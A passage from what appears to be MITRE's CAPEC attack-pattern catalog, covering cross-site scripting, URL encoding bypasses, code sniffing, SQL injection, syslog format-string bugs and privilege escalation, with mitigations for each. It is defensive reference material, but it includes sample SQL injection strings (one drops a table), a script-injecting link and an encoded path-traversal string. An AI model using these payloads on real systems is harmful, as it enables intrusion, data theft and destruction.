Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Probe identified potential entry points for XSS vulnerability
The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.
Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
env-Web
Use a proxy tool to record results of manual input of XSS probes in known URLs.
env-Web
Use a list of XSS probe strings to inject script into UI entry fields. If possible, the probe strings contain a unique identifier.
env-Web
Use a list of XSS probe strings to inject script into resources accessed by the application. If possible, the probe strings contain a unique identifier.
env-Web
The output of pages includes some form of a URL parameter. e.g., ?error="<foobar>'(){};=" becomes "<foobar>'(){}=" in the title of the web page.
env-Web
Input content becomes part of the web page.
env-Web
Nothing is returned to the web page. It may be a stored XSS. The unique identifier from the probe helps to trace the flow of the possible XSS.
env-Web
The attacker's cross-site scripting string is repeated back verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, script, etc.)
All HTML-sensitive characters are consistently re-encoded before being sent to the web browser.
Some sensitive characters are consistently encoded, but others are not.
Monitor input to web servers (not only GET, but all potential inputs), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that adversaries use.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Steal session IDs, credentials, page content, etc.
As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.
env-Web
The attacker gets the user's cookies or other session identifiers.
The attacker gets the content of the page the user is viewing.
The attacker causes the user's browser to visit a page with malicious content.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Forceful browsing
When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).
env-Web
The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF.
The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Content spoofing
By manipulating the content, the attacker targets the information that the user would like to get from the website.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
env-Web
The user sees a page containing wrong information
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Target client software must be a client that allows scripting communication from remote hosts, such as a JavaScript-enabled Web Browser
Very High
High
Injection
Modification of Resources
Protocol Manipulation
Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this
<a href="www.exampletrustedsite.com?Name=<script>maliciousscript</script>">Trusted Site</a>
When the user clicks the link, the appended script also executes on the local user's machine.
Low
To achieve a redirection and use of less trusted source, an attacker can simply place a script in bulletin board, blog, wiki, or other user-generated content site that are echoed back to other client machines.
High
Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.
Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine
Design: Use browser technologies that do not allow client side scripting.
Design: Utilize strict type, character, and encoding enforcement
Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from.
Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.
Implementation: Perform input validation for all remote content.
Implementation: Perform output validation for all remote content.
Implementation: Session tokens for specific host
Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Integrity
Modify application data
Confidentiality
Read application data
Malicious input delivered through standard content (containing scripts) that is sent to the user's machine, for example HTML page containing JavaScript.
Varies with instantiation of attack pattern. Malicious script payload may be appended to end of legitimate looking link
Client browser, its component libraries, and client network (e.g. Intranet)
Enables attacker to execute scripts to launch attacks on remote client machine and environment. Intranet and local systems may not be patched to the same degree as "externally" facing systems, so simple attacks may identify more victims on an "internal" system such as a corporate Intranet
79
Targeted
20
Targeted
184
Secondary
96
Targeted
113
Targeted
348
Targeted
116
Targeted
350
Targeted
86
Secondary
602
Targeted
692
Targeted
697
Targeted
713
Targeted
71
Targeted
1000
Attack Pattern
ChildOf
242
333
Category
HasMember
341
Penetration
Exploitation
High
High
High
Client-Server
J2EE
.NET
All
JSP
Java
ASP.NET
ASP
PHP
AJAX
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
The attacker accesses the server using a specific URL.
The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly.
The attacker crafts a malicious URL string request and sends it to the server.
The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences.
The application accepts and decodes URL string request.
The application performs insufficient filtering/canonicalization on the URLs.
High
High
Injection
Protocol Manipulation
API Abuse
Attack Example: Combined Encodings CesarFTP
Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.
An attacker could provide a URL that included a string like
/...%5C/
This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.
CVE-2001-1335
Low
An attacker can try special characters in the URL and bypass the URL validation.
Medium
The attacker may write a script to defeat the input filtering mechanism.
An attacker can manually inject special characters in the URL string request and observe the results of the request.
Custom scripts can also be used. For example, a good script for verifying the correct interpretation of UTF-8 encoded characters can be found at http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt
Automated tools such as fuzzer can be used to test the URL decoding and filtering.
If the first decoding process has left some invalid or blacklisted characters, that may be a sign that the request is malicious.
Traffic filtering with IDS (or proxy) can detect requests with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks.
Sometime the percent escaping can be used to obfuscate the attack itself.
Alternative method of data encoding can be used.
Obfuscation technique such as IP address encoding can also be used. [R.64.3]
Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Test your decoding process against malicious input.
Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.
When client input is required from web-based forms, avoid using the "GET" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the "POST method whenever possible.
Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.
Refer to the RFCs to safely decode URL.
Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.
There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).
Availability
DoS: resource consumption (other)
Denial of Service
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read files or directories
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
177
Targeted
171
Targeted
173
Targeted
172
Targeted
73
Targeted
21
Targeted
22
Targeted
74
Targeted
20
Targeted
697
Targeted
707
Targeted
1000
Attack Pattern
ChildOf
72
1000
Attack Pattern
PeerOf
71
1000
Attack Pattern
PeerOf
79
1000
Attack Pattern
ChildOf
79
1000
Attack Pattern
PeerOf
72
1000
Attack Pattern
PeerOf
43
1000
Attack Pattern
ChildOf
267
1000
Attack Pattern
ChildOf
126
Reluctance to Trust
Penetration
Medium
High
Medium
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
Gunter Ollmann
URL Encoded Attacks - Attacks using the common web browser
CGISecurity.com
http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html
T. Berners-Lee
R. Fielding
L. Masinter
RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax
January 2005
http://www.ietf.org/rfc/rfc3986.txt
T. Berners-Lee
L. Masinter
M. McCahill
RFC 1738 - Uniform Resource Locators (URL)
December 1994
http://www.ietf.org/rfc/rfc1738.txt
HTML URL Encoding Reference
URL Encoding Reference
W3Schools.com
Refsnes Data
http://www.w3schools.com/tags/ref_urlencode.asp
The URLEncode and URLDecode Page
Albion Research Ltd
http://www.albionresearch.com/misc/urlencode.php
David Wheeler
Secure Programming for Linux and Unix HOWTO
5.11.4. Validating Hypertext Links (URIs/URLs)
http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attackers can capture application code bound for the client and can use it, as-is or through reverse-engineering, to glean sensitive information or exploit the trust relationship between the client and server.
Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.
Set up a sniffer
The attacker sets up a sniffer in the path between the server and the client and watches the traffic.
The attacker sets up a sniffer in the path between the server and the client.
env-ClientServer
The attacker successfully sets up a sniffer in the path between the server and client.
The attacker could not set up a sniffer in the path between the server and client.
Check the network interface (e.g., ifconfig/ipconfig) to see whether the network adapter is running in promiscuous mode.
Encrypt all communications between the server and client.
Capturing Application Code Bound During Patching
Attacker knows that the computer/OS/application can request new applications to install, or it periodically checks for an available update. The attacker loads the sniffer set up during Explore phase, and extracts the application code from subsequent communication. The attacker then proceeds to reverse engineer the captured code.
Attacker loads the sniffer to capture the application code bound during a dynamic update.
env-Web
The attacker proceeds to reverse engineer the captured code.
env-All
The attacker can capture the application code bound for the target.
env-Web
The communication between the server and client is encrypted. The attacker may still possible to lift key material from the client.
env-Web
The attacker captures the application code bound for the target and reverse engineers the captured code.
Check the network interface (e.g., ifconfig) to detect the sniffer.
Encrypt all communications between the server and client.
The attacker must have the ability to place himself in the communication path between the client and server.
The targeted application must receive some application code from the server; for example, dynamic updates, patches, applets or scripts.
The attacker must be able to employ a sniffer on the network without being detected.
High
Low
Attacker receives notification that the computer/OS/application has an available update, loads a network sniffing tool, and extracts update data from subsequent communication. The attacker then proceeds to reverse engineer the captured stream to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc..
Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such.
Medium
The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. Also if the attacker plans to employ a man-in-the-middle attack, the client or server must not realize this. Finally, the attacker needs to regenerate source code from binary code if the need be.
The Attacker needs the ability to capture communications between the client being updated and the server providing the update.
In the case that encryption obscures client/server communication the attacker will either need to lift key material from the client.
Design: Encrypt all communication between the client and server.
Implementation: Use SSL, SSH, SCP.
Operation: Use "ifconfig/ipconfig" or other tools to detect the sniffer installed in the network.
Confidentiality
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
319
Targeted
311
Secondary
318
Secondary
693
Targeted
719
Targeted
1000
Attack Pattern
ChildOf
37
1000
Attack Pattern
ChildOf
158
Do not store secrets in client code
All potentially sensitive data, including code, transmitted to the client must be encrypted
Never Assuming that Your Secrets Are Safe
Securing the Weakest Link
Use Well-Known Cryptography Appropriately and Correctly
Use Authentication Mechanisms, Where Appropriate, Correctly
Reconnaissance
Exploitation
High
Medium
Low
Client-Server
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended.
SQL Injection results from failure of the application to appropriately validate input. When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to talk directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database. In order to successfully inject SQL and retrieve information from a database, an attacker:
Survey application
The attacker first takes an inventory of the functionality exposed by the application.
Spider web sites for all available links
env-Web
Sniff network communications with application using a utility such as WireShark.
env-ClientServer env-Peer2Peer env-CommProtocol
At least one data input to application identified.
No inputs to application identified. Note that just because no inputs are identified does not mean that the application will not accept any.
Determine user-controllable input susceptible to injection
Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to SQL injection, attempt to inject characters that have special meaning in SQL (such as a single quote character, a double quote character, two hyphens, a parenthesis, etc.). The goal is to create a SQL query with an invalid syntax.
Use web browser to inject input through text fields or through HTTP GET parameters.
env-Web
Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
env-Web
Use network-level packet injection tools such as netcat to inject input
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Use modified client (modified by reverse engineering) to inject input.
env-ClientServer env-Peer2Peer env-CommProtocol
Attacker receives normal response from server.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Attacker receives an error message from server indicating that there was a problem with the SQL query.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException)
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
At least one user-controllable input susceptible to injection found.
No user-controllable input susceptible to injection found.
Search for and alert on unexpected SQL keywords in application logs (e.g. SELECT, DROP, etc.).
Input validation of user-controlled data before including it in a SQL query
Use parameterized queries (e.g. PreparedStatement in Java, and Command.Parameters.Add() to set query parameters in .NET)
Experiment and try to exploit SQL Injection vulnerability
After determining that a given input is vulnerable to SQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, or to modify or delete information in the database.
Use public resources such as "SQL Injection Cheat Sheet" at http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/, and try different approaches for adding logic to SQL queries.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Add logic to query, and use detailed error messages from the server to debug the query. For example, if adding a single quote to a query causes an error message, try : "' OR 1=1; --", or something else that would syntactically complete a hypothesized query. Iteratively refine the query.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Use "Blind SQL Injection" techniques to extract information about the database schema.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
If a denial of service attack is the goal, try stacking queries. This does not work on all platforms (most notably, it does not work on Oracle or MySQL). Examples of inputs to try include: "'; DROP TABLE SYSOBJECTS; --" and "'); DROP TABLE SYSOBJECTS; --". These particular queries will likely not work because the SYSOBJECTS table is generally protected.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Success outcome in previous step.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Failure outcome in previous step.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Attacker achieves goal of unauthorized system access, denial of service, etc.
Attacker unable to exploit SQL Injection vulnerability.
SQL queries used by the application to store, retrieve or modify data.
User-controllable input that is not properly validated by the application as part of SQL queries.
High
Very High
Injection
With PHP-Nuke versions 7.9 and earlier, an attacker can successfully access and modify data, including sensitive contents such as usernames and password hashes, and compromise the application through SQL Injection. The protection mechanism against SQL Injection employs a blacklist approach to input validation. However, because of improper blacklisting, it is possible to inject content such as "foo'/**/UNION" or "foo UNION/**/" to bypass validation and glean sensitive information from the database.
CVE-2006-5525
Low
It is fairly simple for someone with basic SQL knowledge to perform SQL injection, in general. In certain instances, however, specific knowledge of the database employed may be required.
None
The attacker tries to inject characters that can cause a SQL error, such as single-quote (') or keywords such as "UNION" and "OR". If the injection of such characters into the input causes a SQL error and the resulting error is displayed unfiltered, the attacker can begin to determine the nature of input validation and structure of SQL queries. A typical error resulting from such injection would look like:
"You have an error in your SQL Syntax. Check your manual for the right syntax to use near
') FROM db_users.user_table"
With available design documentation and code, the attacker can determine whether all user-controllable inputs are being validated or not, and also the structure of SQL queries that such inputs feed into.
Too many false or invalid queries to the database, especially those caused by malformed input.
Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.
Use of parameterized queries or stored procedures - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. Note that SQL Injection is possible even in the presence of stored procedures if the eventual query is constructed dynamically.
Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.
Integrity
Modify application data
Confidentiality
Read application data
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
User-controllable input used as part of non-parameterized SQL queries: This may include input fields on web forms, data in user-accessible files or even command-line parameters.
SQL statements intended to reveal information or run malicious code
Back-end database
When malicious SQL content is executed by the database, it can lead to arbitrary queries being executed, causing disclosure of information, unauthorized access, privilege escalation and possibly system compromise.
89
Targeted
74
Secondary
20
Secondary
390
Secondary
697
Secondary
713
Secondary
707
Secondary
1000
Attack Pattern
ChildOf
248
Special characters in user-controllable input must be escaped before use by the application.
Only use parameterized stored procedures to query the database.
Input data must be revalidated in the parameterized stored procedures.
Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the database.
Reluctance to Trust
Failing Securely
Defense in Depth
Never Use Input as Part of a Directive to any Internal Component
Handle All Errors Safely
Penetration
Exploitation
High
High
High
All
All
All
All
Common Weakness Enumeration (CWE)
CWE-89 - SQL Injection
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/89.html
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
Common Weakness Enumeration (CWE)
CWE-390 - Improper Error Handling
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/390.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets the format string vulnerabilities in the syslog() function. An attacker would typically inject malicious input in the format string parameter of the syslog function. This is a common problem, and many public vulnerabilities and associated exploits have been posted.
The attacker finds that he can inject data to the format string parameter of Syslog().
The attacker craft a malicious input and inject it into the format string parameter. From now on, the attacker can execute arbitrary code and do more damage.
The format string argument of the Syslog function can be tainted with user supplied data.
Very High
High
Injection
Format string vulnerability in TraceEvent function for ntop before 2.1 allows remote attackers to execute arbitrary code by causing format strings to be injected into calls to the syslog function, via (1) an HTTP GET request, (2) a user name in HTTP authentication, or (3) a password in HTTP authentication.
CVE-2002-0412
If the source code of the application is available, an attacker can use static analysis tools to spot a syslog vulnerability (a simple grep may also work).
If the source code is not available, automated tools such as Fuzzer and advanced Web Scanner can be used. If the tool supplied data reaches the syslog's format string argument, the application under scrutiny may have unexpected behavior.
If the source code is not available, a more complex technique involve the use of library and system call tracer combined with the use of binary auditing tool such as IDA Pro. Reverse Engineering technique can be used to find format string vulnerability in the syslog function call. For instance it is possible to get the address of the buffer that is later used as the format string when reading data
The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():
syslog(LOG_ERR, "%s", cmdBuf);
The following code shows a vulnerable usage of Syslog():
syslog(LOG_ERR, cmdBuf);
// the buffer cmdBuff is taking user supplied data.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Availability
DoS: crash / exit / restart
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Integrity
Modify memory
Untrusted user supplied data is the injection vector.
The maliciously crafted data can read from the stack if passed to the Syslog function as a format String.
The signature of the syslog function is as following:
void syslog(int priority, const char *format, ...);
A vulnerable usage would be:
syslog(LOG_ERR, cmdBuf);
where cmdBuf is a user controlled data which leads to a format string vulnerability. The activation zone is the format String argument which accepts user supplied data.
The impacts of this attack can be execution of arbitrary code. Execution of arbitrary code can lead to many problems such as corruption of data, unauthorized access, etc.
120
Secondary
134
Targeted
74
Secondary
20
Secondary
680
Targeted
697
Targeted
CVE-2002-0573
format string in bad call to syslog function
CVE-2001-0717
format string in bad call to syslog function
CVE-2002-0412
format string in bad call to syslog function
1000
Attack Pattern
ChildOf
100
333
Category
HasMember
339
Choose a language which is not subject to this flaw.
Do not use the Syslog() in your implementation.
Use manual or automated code review to spot potential format string vulnerability in functions such as Syslog(), Vsyslog(), snprintf(), etc.
Reluctance to Trust
Verify that input is of a limited size.
If the message is coming from an outside source, check for %s type parameters and ensure that bounds will not be overwritten.
Don't use text from an outside source as a format string.
Penetration
Exploitation
High
High
High
All
All
All
All
C
C++
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-119: Buffer Errors
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/119.html
scut
team teso
Exploiting Format String Vulnerabilities
http://doc.bughunter.net/format-string/exploit-fs.html
Halvar Flake
Auditing binaries for security vulnerabilities
http://www.blackhat.com/presentations/bh-europe-00/HalvarFlake/HalvarFlake.ppt
Fortify Taxonomy of Vulnerabilities
Fortify Software
http://vulncat.fortifysoftware.com/1/FS.html
Syslog man page
http://www.rt.com/man/syslog.3.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
Because languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment, subverting this mechanism can be instrumental in an attacker escalating privilege.
Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack. This pattern does not include circumstances through which a signing key has been stolen.
A framework-based language that supports code signing (such as, and most commonly, Java or .NET)
Deployed code that has been signed by its authoring vendor, or a partner.
The attacker will, for most circumstances, also need to be able to place code in the victim container. This does not necessarily mean that they will have to subvert host-level security, except when explicitly indicated.
Very High
Low
Spoofing
API Abuse
In old versions (prior to 3.0b4) of the Netscape web browser Attackers able to foist a malicious Applet into a client's browser could execute the "Magic Coat" attack. In this attack, the offending Applet would implement its own getSigners() method. This implementation would use the containing VM's APIs to acquire other Applet's signatures (by calling _their_ getSigners() method) and if any running Applet had privileged-enough signature, the malicious Applet would have inherited that privilege just be (metaphorically) donning the others' coats.
Some (older) web browsers allowed scripting languages, such as JavaScript, to call signed Java code. In these circumstances, the browser's VM implementation would choose not to conduct stack inspection across language boundaries (from called signed Java to calling JavaScript) and would short-circuit "true" at the language boundary. Doing so meant that the VM would allow any (unprivileged) script to call privileged functions within signed code with impunity, causing them to fall prey to luring attacks.
The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers.
High
Subverting code signing is not a trivial activity. Most code signing and verification schemes are based on use of cryptography and the attacker needs to have an understand of these cryptographic operations in good detail. Additionally the attacker also needs to be aware of the way memory is assigned and accessed by the container since, often, the only way to subvert code signing would be to patch the code in memory.
Finally, a knowledge of the platform specific mechanisms of signing and verifying code is a must.
The Attacker needs no special resources beyond the listed prerequisites in order to conduct this style of attack.
Understanding, and possibly exploiting, the effect of certain flags or environment variables on code signing.
Introducing unmanaged code into a container-managed environment
A given code signing scheme may be fallible due to improper use of cryptography. Developers must never roll out their own cryptography, nor should existing primitives be modified or ignored.
If an attacker cannot attack the scheme directly, he might try to alter the environment that affects the signing and verification processes. A possible mitigation is to avoid reliance on flags or environment variables that are user-controllable.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
325
Targeted
328
Targeted
CVE-2006-5201
Multiple packages on Sun Solaris, including (1) NSS; (2) Java JDK and JRE 5.0 Update 8 and earlier, SDK and JRE 1.4.x up to 1.4.2_12, and SDK and JRE 1.3.x up to 1.3.1_19; (3) JSSE 1.0.3_03 and earlier; (4) IPSec/IKE; (5) Secure Global Desktop; and (6) StarOffice, when using an RSA key with exponent 3, removes PKCS-1 padding before generating a hash, which allows remote attackers to forge a PKCS #1 v1.5 signature that is signed by that RSA key and prevents these products from correctly verifying X.509 and other certificates that use PKCS #1.
CVE-2006-4790
verify.c in GnuTLS before 1.4.4, when using an RSA key with exponent 3, does not properly handle excess data in the digestAlgorithm.parameters field when generating a hash, which allows remote attackers to forge a PKCS #1 v1.5 signature that is signed by that RSA key and prevents GnuTLS from correctly verifying X.509 and other certificates that use PKCS, a variant of CVE-2006-4339.
1000
Category
ChildOf
232
Use Well-Known Cryptography Appropriately and Correctly
Exploitation
High
High
High
Client-Server
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets programs running with elevated privileges. The attacker would try to leverage a bug in the running program and get arbitrary code to execute with elevated privileges. For instance an attacker would look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break. The malicious user try to execute its code at the same level as a privileged system call.
The attacker probes for programs running with elevated privileges.
The attacker finds a bug in a program running with elevated privileges.
The attacker exploits the bug that she has found. For instance she can try to inject and execute arbitrary code or write to OS resources.
The targeted program runs with elevated OS privileges.
The targeted program accepts input data from the user or from another program.
The targeted program does not perform input validation properly.
The targeted program does not fail safely. For instance when a program fails it may authorize restricted access to anyone.
The targeted program has a vulnerability such as buffer overflow which may be exploited if a malicious user can inject unvalidated data. For instance a buffer overflow interrupts the program as it executes, and makes it run additional code supplied by the attacker. If the program under attack has elevated privileges to the OS, the attacker can elevate its privileges (such as having root level access).
The targeted program is giving away information about itself. Before performing such attack, an eventual attacker may need to gather information about the services running on the host target. The more the host target is verbose about the services that are running (version number of application, etc.) the more information can be gather by an attacker.
This attack often requires communicating with the host target services directly. For instance Telnet may be enough to communicate with the host target.
Very High
Very High
Injection
API Abuse
Protocol Manipulation
Flooding
Low
An attacker can use a tool to scan and automatically launch an attack against known issues. A tool can also repeat a sequence of instructions and try to brute force the service on the host target, an example of that would be the flooding technique.
Medium
High
More advanced attack may require knowledge of the protocol spoken by the host service.
Probing technique include fuzzing (sending random data in order to fail the service on the host target), brute forcing (with automated tools), network scanning to determine which services are available and running on the target host.
There are freely available tools to probe and gather information from host target. For instance, the attacker can find out that a host target has not been patched by collecting such information.
The log can have a trace of abnormal activity. Also if abnormal activity is detected on the host target. For instance flooding should be seen as abnormal activity and the target host may decide to take appropriate action in order to mitigate the attack (data filtering or blocking). Resource exhaustion is also a sign of abnormal activity.
The attacker may try to hide her attack by forging the host's logs. The attacker has interest in mimicking a legitimate call to the program or service under threat.
Apply the principle of least privilege.
Validate all untrusted data.
Apply the latest patches.
Scan your services and disable the ones which are not needed and are exposed unnecessarily. Exposing programs increases the attack surface. Only expose the services which are needed and have security mechanisms such as authentication built around them.
Avoid revealing information about your system (e.g., version of the program) to anonymous users.
Make sure that your program or service fail safely. What happen if the communication protocol is interrupted suddenly? What happen if a parameter is missing? Does your system have resistance and resilience to attack? Fail safely when a resource exhaustion occurs.
If possible use a sandbox model which limits the actions that programs can take. A sandbox restricts a program to a set of privileges and commands that make it difficult or impossible for the program to cause any damage.
Check your program for buffer overflow and format String vulnerabilities which can lead to execution of malicious code.
Monitor traffic and resource usage and pay attention if resource exhaustion occurs.
Protect your log file from unauthorized modification and log forging.
Confidentiality
Integrity
Availability
